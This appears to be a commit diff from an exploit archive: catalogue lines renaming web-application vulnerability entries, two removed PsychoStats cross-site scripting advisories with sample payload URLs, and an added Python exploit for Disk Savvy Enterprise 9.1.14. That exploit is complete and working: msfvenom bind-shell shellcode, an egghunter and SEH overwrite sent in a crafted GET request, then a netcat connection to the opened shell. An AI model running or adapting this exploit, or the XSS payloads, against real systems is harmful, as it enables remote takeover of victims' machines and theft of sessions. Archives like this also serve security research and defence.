2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - (FrontPage.php) Remote File Inclusion",2006-10-03,Kacper,php,webapps,0
2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0
2472,platforms/php/webapps/2472.pl,"Klinza Professional CMS 5.0.1 - (show_hlp.php) File Inclusion",2006-10-03,Kacper,php,webapps,0
2473,platforms/php/webapps/2473.c,"Invision Gallery 2.0.7 - readfile() & SQL Injection",2006-10-03,1nf3ct0r,php,webapps,0
2474,platforms/php/webapps/2474.txt,"JAF CMS 4.0 RC1 - Multiple Remote File Inclusion",2006-10-04,"ThE TiGeR",php,webapps,0
@ -17098,7 +17099,7 @@ id,file,description,date,author,platform,type,port
3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)",2007-01-17,trew,php,webapps,0
3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - (mep/frame.php) Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0
3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3)",2007-01-17,666,php,webapps,0
3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0
3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0
3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0
3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0
3153,platforms/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps,0
@ -17275,7 +17276,7 @@ id,file,description,date,author,platform,type,port
3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - (download_pdf.php) Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0
3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0
3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0
3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0
3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' Parameter SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0
3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0
3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0
3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0
@ -18777,28 +18778,28 @@ id,file,description,date,author,platform,type,port
5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0
5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0
5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps,0
5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist (idgalery) - SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog - (articulo_id) SQL Injection",2008-05-28,HER0,php,webapps,0
5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist - 'idgalery' Parameter SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0
5685,platforms/php/webapps/5685.txt,"FlashBlog - 'articulo_id' Parameter SQL Injection",2008-05-28,HER0,php,webapps,0
5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps,0
5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' Parameter SQL Injection",2008-05-29,QTRinux,php,webapps,0
5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps,0
5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0
5692,platforms/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - (image.php) Directory Traversal",2008-05-29,Stack,php,webapps,0
5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - 'image.php' Directory Traversal",2008-05-29,Stack,php,webapps,0
5696,platforms/php/webapps/5696.pl,"phpBookingCalendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0
5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps,0
5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' Parameter SQL Injection",2008-05-30,K-159,php,webapps,0
5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps,0
5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload",2008-05-31,irk4z,php,webapps,0
5701,platforms/php/webapps/5701.txt,"Social Site Generator - (sgc_id) SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0
5701,platforms/php/webapps/5701.txt,"Social Site Generator 2.0 - 'sgc_id' Parameter SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0
5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0
5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - (datespan) SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - (site_id) Local File Inclusion",2008-05-31,mozi,php,webapps,0
5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Blind SQL Injection",2008-05-31,JosS,asp,webapps,0
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
5710,platforms/php/webapps/5710.pl,"Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - 'datespan' Parameter SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - 'site_id' Parameter Local File Inclusion",2008-05-31,mozi,php,webapps,0
5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Parameter Blind SQL Injection",2008-05-31,JosS,asp,webapps,0
5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'mid' Parameter SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
5707,platforms/php/webapps/5707.txt,"Social Site Generator 2.0 - 'path' Parameter Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' Parameter SQL Injection",2008-05-31,His0k4,php,webapps,0
5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
@ -18987,7 +18988,7 @@ id,file,description,date,author,platform,type,port
5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection",2008-06-24,K-159,php,webapps,0
5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple SQL Injections",2008-06-24,"CWH Underground",php,webapps,0
5927,platforms/asp/webapps/5927.txt,"DUcalendar 1.0 - (detail.asp iEve) SQL Injection",2008-06-24,Bl@ckbe@rD,asp,webapps,0
5928,platforms/php/webapps/5928.txt,"HiveMaker Directory - 'index.php cid' SQL Injection",2008-06-24,"security fears team",php,webapps,0
5928,platforms/php/webapps/5928.txt,"HiveMaker Directory - 'cid' Parameter SQL Injection",2008-06-24,"security fears team",php,webapps,0
5929,platforms/php/webapps/5929.txt,"E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection",2008-06-24,"Hussin X",php,webapps,0
5930,platforms/php/webapps/5930.txt,"Link ADS 1 - 'out.php linkid' SQL Injection",2008-06-24,"Hussin X",php,webapps,0
5931,platforms/php/webapps/5931.pl,"TOKOKITA - 'barang.php produk_id' SQL Injection",2008-06-24,k1tk4t,php,webapps,0
@ -20331,7 +20332,7 @@ id,file,description,date,author,platform,type,port
7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0
7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - (FrontPage.php) Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
@ -27097,7 +27098,7 @@ id,file,description,date,author,platform,type,port
24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 - (gmembers.php gid Parameter) Blind SQL Injection",2013-03-25,Esac,php,webapps,0
24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0
24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0
24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - (awards.php id Parameter) Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0
24893,platforms/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",php,webapps,0
24894,platforms/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,php,webapps,0
24898,platforms/php/webapps/24898.txt,"SynConnect Pms - 'index.php loginid Parameter' SQL Injection",2013-03-29,"Bhadresh Patel",php,webapps,0
24901,platforms/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,windows,webapps,0
@ -27161,7 +27162,6 @@ id,file,description,date,author,platform,type,port
25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0
25044,platforms/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0
25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps,0
25048,platforms/php/webapps/25048.txt,"PsychoStats 2.x - Login Parameter Cross-Site Scripting",2004-12-22,"James Bercegay",php,webapps,0
25051,platforms/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution",2004-12-23,"Poznan Supercomputing",cgi,webapps,0
25052,platforms/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",php,webapps,0
25053,platforms/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,php,webapps,0
@ -30455,7 +30455,7 @@ id,file,description,date,author,platform,type,port
30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0
30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0
30050,platforms/php/webapps/30050.html,"Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - Server.php Full Path Disclosure",2007-05-17,kefka,php,webapps,0
30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0
30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0
30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0
@ -30854,7 +30854,6 @@ id,file,description,date,author,platform,type,port
30068,platforms/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",php,webapps,0
30070,platforms/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",php,webapps,0
30071,platforms/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion",2007-05-22,the_Edit0r,php,webapps,0
30072,platforms/php/webapps/30072.txt,"PsychoStats 3.0.6b - Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities",2007-05-22,"John Martinelli",php,webapps,0
30073,platforms/php/webapps/30073.txt,"GMTT Music Distro 1.2 - ShowOwn.php Cross-Site Scripting",2007-05-22,CorryL,php,webapps,0
30075,platforms/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",php,webapps,0
30076,platforms/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,php,webapps,0
@ -35708,7 +35707,7 @@ id,file,description,date,author,platform,type,port
38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0
38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0
38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps,0
38127,platforms/php/webapps/38127.php,"PHP - cgimode fpm writeprocmemfile Bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function",2015-09-10,ylbhz,php,webapps,0
38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0
@ -36294,7 +36293,7 @@ id,file,description,date,author,platform,type,port
39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0
39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39273,platforms/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0

Can't render this file because it is too large.

11
platforms/php/webapps/25048.txt
View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/12089/info
PsychoStats is reported prone to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
The problem presents itself when malicious HTML and script code is sent to the application through the 'login' parameter.
This vulnerability may allow for theft of cookie-based authentication credentials or other attacks.
This vulnerability is reported to exist in PsychoStats 2.2.4 Beta and prior versions.
http://www.example.com/stats/login.php?login=%22%3E%3Ciframe%3E

9
platforms/php/webapps/30072.txt
View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/24106/info
PsychoStats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PsychoStats 3.0.6b is vulnerable; other versions may also be affected.
http://www.example.com/psychostats/weapons.php/>"><script>alert(1)</script>

76
platforms/windows/remote/40854.py Executable file
View file

@ -0,0 +1,76 @@
#!/usr/bin/python
import socket,os,time
#SEH Stack Overflow in GET request
#Disk Savvy Enterprise 9.1.14
#Tested on Windows XP SP3 && Windows 7 Professional
host = "192.168.1.20"
port = 80
#badchars \x00\x09\x0a\x0d\x20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"+
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77"+
"\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"+
"\xff\xe7")
seh = "\xc0\x42\x11\x10" #pop pop ret [libspp.dll]
nseh = "\xeb\x06\x90\x90" #jmp short +0x8
egg = "w00tw00t"
offset = 551
buffer_size = 5000
crash = "\x41"*10 + egg + "\x90"*2
crash += buf + "\x90"*(offset-20-len(buf))
crash += nseh + seh + "\x90"*8
crash += egghunter + "\x44"*(buffer_size-offset-16-len(egghunter))
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + host + " 4444")